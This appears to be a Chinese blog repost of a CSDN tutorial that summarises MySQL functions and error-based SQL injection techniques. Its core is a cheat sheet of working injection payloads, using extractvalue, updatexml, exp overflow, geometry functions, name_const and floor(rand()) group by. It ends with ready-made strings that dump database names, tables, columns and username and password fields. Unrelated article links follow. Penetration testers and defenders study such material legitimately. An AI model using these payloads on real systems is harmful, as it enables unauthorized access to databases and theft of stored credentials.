版权声明:本文转载自网络内容,下面附原创链接
原创链接:https://blog.csdn.net/Auuuuuuuu/article/details/91415165

常用函数
 
字符串连接函数,将多个字符串连接成一个字符串,当中间字符串有一个为空时,最后结果也为空

concat(str1, str2, str3 ,...)

concat_ws('指定分隔符', str1,str2,str3...)

开头指定分隔符,与concat()不同,它会自动忽略中间的空值,只有分隔符为空,整体才返回空

group_concat(field_name1,field_name2,field_name3 ...)

分组的方式连接所有字符串(把某个字段下的所有数据全部连接成一个字符串),有长度限制,默认1024

截取字符串函数

substring(要截断的字符串,开始截取位置,截取长度)  (从1开始)

substr 和 substring 操作相同

mysql 专有的字符串截取

mid(要截断的字符串,开始截取位置,截取长度)(从1开始)

左截取 left(str, 3)  从左往右截取3个字符

右截取 right(str, 3)  从右往左截取3个字符

rand()函数会随机产生 [ 0 , 1 )  之间的浮点数

rand(x) 每个x对应一个固定的值,可预测

rand()*2会随机产生 [ 0 , 2 )  之间的浮点数

floor()函数只返回整数部分,小数部分舍弃。

round()函数四舍五入,大于0.5的部分进位,不到则舍弃。

limit用法(从0开始)

如果只给定一个参数,表示记录数

检索前3条记录   等价于 右图

检索4条记录,从第2条数据开始(从0开始)

count(*)是对行数目进行计数

常用的Mysql内置变量
version()                                          当前数据库详细版本号

database()                                       当前所在的数据库

user()                                               当前数据库用户权限

@@datadir                                      数据文件的存放目录

@@basedir                                     数据库的安装路径

@@version_compile_os               宿主系统平台是什么

@@hostname                                 当前机器的机器名

show variables like 'log_%            查看日志文件存放位置

报错函数

xpath处理函数报错注入
extractvalue(xml_doc, xpath)                       从指定xml文档中查询指定的字符串

updatexml(xml_doc,xpath,new_value)        利用xpath把xml文档中的指定字符串替换成新值

报错payload:

and (extractvalue(1,concat(0x7e,(select user()),0x7e)));
and (updatexml(1,concat(0x7e,(select user()),0x7e),1));

参数Xpath需要的是 xpath格式的字符串,不是就会报错,sql语句由内向外执行报错得到查询的信息

MySQL 5.1.5版本中添加了对XML文档进行查询和修改的函数,所以MySQL 5.1.5版本以下的不能上述函数进行报错注入

并且,上述报错注入函数有字符限制,最长32位

整形溢出报错注入:
exp(x)  数学函数 返回值 e (自然对数的底) 的 x 次方

报错payload:

and exp(~(select * from(select user())a));

将0按位取反就会返回最大数“18446744073709551615”,再加上函数成功执行后返回0的缘故,我们将成功执行的函数取反就会得到最大的无符号BIGINT值。

exp是以e为底的指数函数,由于数字太大是会产生溢出。这个函数会在参数大于709时溢出,报错。

所以我们通过子查询与按位求反,造成一个DOUBLE overflow error,并借由此注出数据

MySql5.5.5版本后整形溢出才会报错

几何函数报错注入
geometrycollection(),multipoint(),polygon(),multipolygon(),linestring(),multilinestring()

函数对参数要求是形如(1 2,3 3,2 2 1)这样几何数据,如果不满足要求,则会报错

上述函数经本地测试,本地高版本MySQL无法得到数据(5.6.22)

成功得到数据如下所示:

select multipoint((select * from (select * from (select * from (select version())a)b)c));
ERROR 1367 (22007): Illegal non geometric '(select `c`.`version()` from (select '5.5.40-log' AS `version()` from dual) `c`)' value found during parsing

列名重复报错注入
name_const()函数 

报错payload:

select * from (select NAME_CONST(version(),1),NAME_CONST(version(),1))a;

name_const(name,value)函数会用传入的参数返回一列结果集.传入的参数必须是常量,如果不是则报错

报错payload :因为两列列名相同,外面选择时候报错,说重复列

经测试,只能查version() 函数其他可能因为不是常量的原因报参数错误的错误,不会回显想要的信息   略鸡肋

虚拟表主键重复报错注入
floor() + rand() + group by

报错payload:

select count(*) from information_schema.tables group by concat(version(),floor(rand(0)*2));

原理参考链接:https://www.2cto.com/article/201604/498394.html

group by key (key为虚拟表的主键)

循环读取数据的每一行,将结果保存于临时表中。读取每一行的key时,如果key存在于临时表中,则不在临时表中更新临时表的数据;如果key不在临时表中,则在临时表中插入key所在行的数据

其他payload(修改 limit 即可):

爆所有数据库:

and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,schema_name,0x7e) FROM information_schema.schemata LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

爆表:

and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,table_name,0x7e) FROM information_schema.tables where table_schema=database() LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

爆字段:

and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,column_name,0x7e) FROM information_schema.columns where table_name=表名 LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

爆内容:

and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x23,username,0x3a,password,0x23) FROM user limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

————————————————
版权声明:本文为CSDN博主「Au.J」的原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接及本声明。
原文链接:https://blog.csdn.net/Auuuuuuuu/article/details/91415165

MySQL报错注入函数汇总及常用注入语句的更多相关文章

  1. SQL注入之Mysql报错注入

    --志向和热爱是伟大行为的双翼. 昨天偷懒了没学什么东西,先自我反省一下 - -. 今天认真的学习了一下Mysql报错注入利用方法及原理,好久之前就像认真的学一下这个了,是在上海市大学生网络安全大赛中 ...

  2. SQL注入之MySQL报错注入整理

    看大佬们的文章看得我虎躯一震,精神抖擞,于是心血来潮,整理一下MySQL报错注入常见的手段和方法,再举几个例子 <代码审计:企业级Web代码安全架构>一书中介绍过报错注入十大方法,依次是: ...

  3. Mysql报错注入原理分析(count()、rand()、group by)

    Mysql报错注入原理分析(count().rand().group by) 0x00 疑问 一直在用mysql数据库报错注入方法,但为何会报错? 百度谷歌知乎了一番,发现大家都是把官网的结论发一下截 ...

  4. PHP连接MySQL报错:SQLSTATE[HY000] [2002] Can't connect to local MySQL server through socket 'MySQL' (2)

    如下所示,PHP连接MySQL报错: SQLSTATE[HY000] [2002] Can't connect to local MySQL server through socket 'MySQL' ...

  5. 开启bin-log日志mysql报错:This function has none of DETERMINISTIC, NO SQL解决办法

    开启bin-log日志mysql报错:This function has none of DETERMINISTIC, NO SQL解决办法: 创建存储过程时 出错信息: ERROR 1418 (HY ...

  6. Asp.Net连接Mysql报错Out of sync with server

    Asp.Net连接Mysql报错Out of sync with server 原因:程序引用的MySql.Data.dll版本高于服务器版本 解决:下载一个低版本的MySql.Data.dll,项目 ...

  7. Linux系统下启动MySQL报错:Neither host &#39;localhost.localdomain&#39; nor &#39;localhost&#39; could be looked up with

    Linux系统下启动MySQL报错:Neither host 'localhost.localdomain' nor 'localhost' could be looked up with 摘要 Li ...

  8. 启动Mysql报错:Another MySQL daemon already running with the same unix socket.

    启动Mysql报错: Another MySQL daemon already running with the same unix socket. 删除如下文件即可解决 /var/lib/mysql ...

  9. 解决:MySQL 报错:1045 - Access denied for user 'root'@'localhost'(using password YES)

    一.前言 今年疯狂迷上了开源,只要看到好的开源项目,就会不顾一切一股脑扎进去研究,五一期间发现一个很好的关于众筹的开源项目,但不巧,这个项目竟然是 PHP 写的,没学过 PHP,自然对这个开源项目毫无 ...

随机推荐

  1. HDU 5565:Clarke and baton

    Clarke and baton  Accepts: 14  Submissions: 79  Time Limit: 12000/6000 MS (Java/Others)  Memory Limi ...

  2. php 增删改查范例(3)

    编辑页面edit.php: <?php$id=$_GET['id'];$db= new mysqli('localhost','root','root','db_0808');$sql=&quo ...

  3. JavaScript图形实例:图形的平移和对称变换

    1.1  六瓣花平移变换 平移变换是指图形从一个位置到另一个位置所作的直线移动.如果要把一个位于P(x,y)的点移到新位置P’(x’,y’),如图1,则只要在原坐标上加上平移距离Tx和Ty即可. 即  ...

  4. python 中的 *args 和 **kwargs

    在阅读Python代码时,经常会看到如下函数的定义: def fun(*args, **kwargs): 很多同学可能会对此感到困惑,这个 * args和 **kwargs是什么东西.为啥会在源码中应 ...

  5. mongoDB 分片集群常用指令

    1.帮助指令:sh.help(),查看有哪些指令及其含义和使用方法. mongos> sh.help() sh.addShard( host )                       se ...

  6. 你知道HTTP协议的ETag是干什么的吗?

    前言 在HTTP1.1规范中,新增了一个HTTP头信息:ETag.对于普通开发者来说,可能平时真的不会接触到该HTTP头.平时接触不到或者说用得少,不代表这个请求头不重要.ETag使用得当,是可以减少 ...

  7. 三 基于Java数组手写循环队列

    Code: package dataStucture2.stackandqueue; /** * 手写循环队列 * * @param <E> */ public class MyLoopQ ...

  8. tomcat项目已存在错误

    Could not publish server configuration for Apache Tomcat v8.0-1 at localhost.Multiple Contexts have ...

  9. win10下python3安装深度学习一般要用的库

    matplotlib :绘图库 seaborn:基于matplotlib的图形可视化包 numpy:函数.矩阵运算库 pandas :基于numpy的结构化数据分析库 首先看一下cmd能不能使用pip ...

  10. 嵊州普及Day5T1

    题意:有n个商店,自家商店的定价不可高于任何一家商店定价,求自家商店最高定价. 思路:拿个变量打擂台即可,不用解释太多. 见代码: #include<iostream> #include& ...